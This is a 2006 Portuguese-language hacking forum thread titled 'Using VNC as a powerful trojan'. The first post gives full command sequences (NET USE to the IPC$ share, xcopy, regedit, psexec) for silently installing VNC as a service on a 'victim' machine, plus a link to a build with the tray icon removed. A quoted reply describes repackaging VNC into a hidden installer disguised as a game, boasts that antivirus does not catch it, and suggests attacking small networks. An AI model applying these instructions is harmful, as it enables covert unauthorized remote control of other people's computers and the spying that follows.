[Tutorial] Usando VNC como trojan potente

Started by J.spY, 15 de March , 2006, 11:03:27 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

J.spY

15 de March , 2006, 11:03:27 PM
################################
Como instalar o VNC versão 3.3.7 em uma máquina remota
################################

Essa é a parte legal deste tuto.. não presisa mandar nada para a vítima.. Só usamos o Psexec para entrar no sistema dela.. a unica coisa ruim é que presisamos saber a senha dela...

=================
Introdução:
=================
VNC é um utilitário livre para controlar remotamente outro computador, veja em http://www.realvnc.com para mais detalhes.



Começamos o truque assumindo que:
O computador remoto está rodando Windows 2000, 2003, NT4 ou XP Pro
(XP Home não contém uma IPC$ até onde eu sei).
Você tem tem direitos administrativos no computador remoto (root).
Este truque está focando em iniciar o vnc no PC remoto como service, não como uma aplicação.



====================
Passo 1: Intalle o VNC em seu próprio computador e configure a senha.
====================
Baixe o Real VNC e instale no seu computador local (para este truque, a versão 3.3.7 foi usada).
Durante o processo de instalação, sertifique-se que você marcou as opções:
Register VNC Server as a system service;
Start the VNC system service.
No final do processo de instalação, você reseberá uma mensagem para configurar a senha.
A senha que você por vai ser usada mais tarde para se conectar ao computador remoto.
Se por algum motivo você não for alertado no final da instalação para configurar uma senha, execute o seguinte a partir da linha de comando:
"C:\Arquivos de Programa\RealVNC\WinVNC\winvnc.exe" -defaultsettings
Também execute net start pela linha de comando para confirmar se o VNC está executando em service mode.



===================
Passo 2: Configure o VNC no PC remoto usando PsExec
===================
PsExec é uma feramenta livre para executar processos em um PC remoto, e está disponível em:
http://www.sysinternals.com/ntw2k/freeware/psexec.shtml

O usuário e a senha que você usar deve fazer parte do grupo de usuários administrativos do computador remoto ao qual irá se conectar.
"\\PCRemoto" mencionado abaixo pode ser tanto o nome do computador (rede) quanto o seu IP.
Logando no computador remoto no IPC$ share com uma conta administrativas.

Se você não incluiu a senha em um texto plano, você vai receber uma mensagem dizendo para pegar a senha da fonte (que não vai ser mostrado como texto liso).
NET USE \\RemotePC\IPC$ /user:administrator password



==================
Passo 3: Copie seus arquivos locais do VNC para o computador remoto.
=================
xcopy "C:\Arquivos de Programa\RealVNC\*.*" "\\Computador remoto\C$\(size=9](size=18]Arquivos de programa[/size][/size]\RealVNC\*.*" /r/i/c/h/k/e



=================
Passo 4: Use o Regedit para exportar a configuração local do registro do VNC para o computador remoto.
================
Nota: Se você preferir você pode exportar o aqruivo localmente e depois copiar ele.
regedit /e "\\PCRemoto\C$\vncdmp.txt" "HKEY_LOCAL_MACHINE\Software\ORL"



=================
Passo 5: Use o PsExec para importar o arquivo de registro abaixo no computador remoto.
=================
psexec \\PCRemoto -s -i -d %\windir%\regedit /s C:\vncdmp.txt
Tenha serteza de usar /s com o regedit, isso fará que nenhuma mensagem de confirmação será mostrada no computador remoto.
Você está usando o regedit no computador remoto fazer este comando. Se o caminho para o regedit for diferente no PC remoto, use o caminho exato ao invés de %windir%
Exeplo: se o seu PC estiver rodando XP Pro e o PC remoto for Windows 2000, use este comando:
psexec \\PCRemoto -s -i -d C:\Winnt\regedit /s C:\vncdmp.txt



==============
Passo 6: Use o PsExec para instalar remotamente o winvnc em service mode.
==============


psexec \\PCRemoto -s -i -d "C:\Arquivos de Programa\RealVNC\WinVNC\winvnc.exe" -install



=================
Passo 7:Use o PsExec para iniciar o "VNC Server" em service mode.
=================
psexec \\RemotePC -s -i -d net start "VNC Server"



Você provavelmente estará apto a se conectar ao PC remoto usando o VNC.



Espero que gostem =)
Qualquer crítica ou sujestão favor postar...


Nota: Pelo o que pude observar vcs estão com problemas no comando C:\ARQUIVOS DE PROGRAMAS, o "espaço" não é muito utilizado, desculpem foi meu erro, em vez de ARQUIVOS DE PROGRAMAS por favor subtituam por ARQUIV~1, assim dará serto.

Nota II: Pessoal o VNC é um programa de administração remota. Seria como um troja, mais por vários fatores tais como o ícone que fica ao lado do tray, ele não é conciderado como um vírus.
Um software de administração remota server (no caso do VNC) para comandar o computador de algum lugar distante. Você pode mecher no seu computador como se realmente estivesse na sua frente.
o ponto forte deste tópico seria para mostrar que podemos tirar o ícone do VNC que fica no canto inferior direito da tela (tray), podemos modificá-lo já que é open-souce. Mais seria mais vantagem para todos se baixássemos ele já alterado. O mesmo se encontra em http://www.jankratochvil.net/project/winvnc para as versões 3.32, 3.33 e 4.00. Você apenas precisará mudar o programa winvnc.exe pelo o que veio no aqruivo comprimido. Após extraí-lo, renomeie-o excluido tudo o que houver após o .exe para que ele passe a funcionar.


Depois disso siga os passos do primeiro tópico para instalar o VNC em máquinas remota sem a vítima presisar interferir em nada.

---------------------

Fonte: http://www.invasao.com.br
Autor: tripbr
Editado por: J.spY
Obs: Li este tutorial e achei muito interessante e resolvi postar, porém não foi feito por mim, eu apenas o editei pegando assim as informações mais importantes do tópico. Todos os créditos ao tripbr. Ainda não tive oportunidade de testar, mas pelos comentários, parece que é funcional... Por falar nisso, que quiser o link direto para o tópico no fórum do Invasão, clique aqui.

Vlw  ;D

"...É melhor ficar calado deixando que todos pensem que você é um idiota, do que abrir a boca e não deixar a menor dúvida®..."

bloodrain

#1
16 de March , 2006, 01:12:05 AM
correçao fonte e ideia orginal: quak2team(eu acho mas nao tenho certeza mas concerteza foi alg do darkers antigo)

J.spY

#2
16 de March , 2006, 01:16:29 PM
Obrigado pela correção, mas no invasão ele diz que o autor foi ele mesmo...

Quak, foi malz ae mano.

"...É melhor ficar calado deixando que todos pensem que você é um idiota, do que abrir a boca e não deixar a menor dúvida®..."

Anonymous

#3
31 de March , 2006, 03:33:04 PM
Tem um desses feito por mi no antigo darkes forum.......................eh a msm coisa porem usando outra tecnica.....mas no final dah no msm....bom tuto

NetKiler

#4
02 de April , 2006, 05:41:04 PM
Quote from: "Invent"Tem um desses feito por mi no antigo darkes forum.......................eh a msm coisa porem usando outra tecnica.....mas no final dah no msm....bom tuto

tenho ele salvo aqui, se alquem quiser dar uma olhada ta muito bem esplicado

Quote from: "Invent"Muitos conhecem o VNC e saber que ele eh o melhor programa de controle remoto de PC
Bom o problema eh que ele tem uma instalaçao mt grande pra passar........isso nuam eh legal

BOm temo que fazer um SETUP novo para o VNC.....assim ele se instala sem a pessoa saber.....bem
vamos lah




Eu estou trabalhando nisso...................eh relativamente simples eh trabalhoso............
mt mt trabalhoso.....bom vamos lah.............................vou esplicar...................
......nos queremos fazer o VNC se instalar sem o setup.................ou seja se extraindo sem
aqyuele papagaiada toda........

Primeiro vc vah no MSDOS e digite o comando

start /w regedit /e reg.txt

bom isso vai criar um arquivo (no caso reg.txt) com todos os dados e todas a chaves de seu
registro.........guarda isso


Depois vc instala o VNC no seu PC............com as comfiguraçoes desejadas no PC alvo....
(cinfigure como se vc estivesse instalando no pa alvo)..
geralmente saum as mesmas..........................
OBS:Vc tem uqe ter a msm versao de sistema que a pessoa!

bom ....................agora eh assim............................vc tenta procurar um
SETUP LOG........si naum tiver.....vc apos a instalaçao manda uma busca por data eh hora no PC
pra achar todos os aquivos intalados apos a intalacao do VNC.....................agora eh
assim.......vc pega cada arquivo desse e cataloga (coloca em que pasta eles ficam e coisa e
talz.....cria uma arvore como esta no seu pc soh que a parte).......ESSA E A PARTE EH A DEMORADA
.........pronto agora vc jah sabe o que o setup instala..............................tem
algumas forma de vc fazer outro setup igual:

IExpress Wizard = iexpress.exe (Cria pacotes de self-extracting e self-installing) no XP
ou um Wizard qq.....(recomendo)..........faça seu setup ficar oculto....utilizando um Joinner
ou intaum deixe ele com cara de intalador de joguinho......sei lah ai vai tua criatividade


No wizard vc colocar os arquvios nas suas devidas pastas.........que vc catalogou acima
criando uma arvode de arquivos e pastas identica a original do VNC


........fazer uma instalaçao atraves de .BAT............eh mt mais trabalhoso....mas sei lah
neh....gosto eh qui nem C* cada um tem o seu


U q vc fez aqui foi um setup que faz a mesma distribuiçao de arquivso que o outro SETUP soh que
vc pode "maquiar" ele para parecer outra coisa e ele naum vai ter interaçao com o usuario.....
........

Acabou??.......NAUM

Bom MAS QQ FALTA?............... as entradas do registro colocadas pelo setup do VNC..........

vah no MSDOS e digite
start /w regedit /e reg2.txt
(LEMBRA DISSO)

AGORA vc usa um programa qq para comparar arquivos de texto tem algum em:

www.superdownloads.com.br

apos comparar vc vai ter todas as chaves de registro mudadas e criadas pela instalaçao do VNC

............ali vc copia o local das chaves e seu nomes e valores........................ai vc
pergunta como eu faco pra adicionar essas chaves..................utilizando a ferramenta mais
util no mundo hacker o Bloco de Notas (melhoria do edit do MSDOS) eh bem simples


crie um aquivo de texto com esse formato:

REGEDIT4 (essa linha tem que ter)

[LOCAL DA CHAVE]
"NOME DA CHAVE"=valor da variavel

[LOCAL DA CHAVE]
"NOME DA CHAVE"=valor da variavel


todas as chaves que tem diferente na comparaçao

ex:

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Java VM\Security]
"EditCustomPermissions"=hex:01,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"MaxUserPort"=dword:0000fffe
"TcpTimedWaitDelay"=dword:0000001e
"StrictTimeWaitSeqCheck"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000507-0000-0010-8000-00AA006D2EA4}\InprocServer32]
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000514-0000-0010-8000-00AA006D2EA4}\InprocServer32]
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0000050B-0000-0010-8000-00AA006D2EA4}\InprocServer32]
"ThreadingModel"="Both"





OBS: essas chaves naum tem nada a ver com as do VNC



Agora vc salva o aqruivo com extencao .REG................e coloque para ela ser executada
junto no seu SETUP




Bom eh soh isso.........vc jah tem um setup "CLONADO"......................isso serve pra qq
ferramenta............

Agora vc usa esse setup como se fosse um server de um TROJAN qq.............

OBS:Naum recomento utilizar o VNC em computadores do Modem Dial UP tanto a sua qnt a da vitima
pois a conxao fica mt lenta e as vesas naum aguenta a pressao e cai!...sem falar que abre um
desconfianca


A melhor coisa desse "TROJAN" e que ele naum eh detectado por nenhum AV e nenhum FW (alguns
pegam sim).........mas vc nuam vai querer outra coisa.............



Outra coisa naum perca tempo invadindo PC´s de amigos tenta coisas mais legais como um
pequena rede eh mt mais legal.........



Essa tecnica foi criada por mim......apesar de se ruma coisa simples e mt util.........
........qq duvida fala ae que agente resolve............

.................vlw

by INVENT

Shady

#5
02 de April , 2006, 06:05:34 PM
Um outro programa usado para executar comandos em sistemas windows remotos (que ja vem com o windows) e o rexec/.


Mundus Vult Decipi

Anonymous

#6
19 de May , 2006, 06:08:53 PM Last Edit: 19 de May , 2006, 07:22:25 PM by Anonymous
kara to dando o comando para enviar os arquivos para o micro do usuario... mas ta dizendo que não achou nenhum arquivo !!! já ate mudei de diretorio e tudo mais fiz como vc falou coloquei arquiv~1.

Agora esta dando que A unidade não é valida !!!!


estou usando o seguinte :



xcopy "C:\Arquivos de programas\TightVNC\*.*" "\\dnig0027\C$\Tig(size=9](size=18]Arquivos de

programa[/size][/size]\htVNC\*.*"

/r/i/c/h/k/e

wolf

#7
08 de July , 2006, 01:45:09 AM
muito complicado mais vlw ....


tem como fazer video aula configurando vcn e mandando pra '' vitima '' ?

tipo desde o começo tava precizando para colocar no escritorio do meu pai ... 
tipo uma video aula desde abaxando o vcn e configurando  ate  '' infctando a vitima ''

nibbles

#8
08 de July , 2006, 12:28:10 PM
IPC$ é a pasta que vem compartilhada por default não é? aquela que o r3x usa pra 'invadir' ...
pelo que entendi o pc precisa estar compartilhado pra isso funcionar, ou entendi errado?
por favor me corrija..
o tuto está bem legal :)



"A diversão do inteligente é se fingir de burro para aquele que se finge de inteligente."
"ENGENHARIA SOCIAL. Porque não existe patch para a ignorância humana."
Print
Go Up Pages1
User actions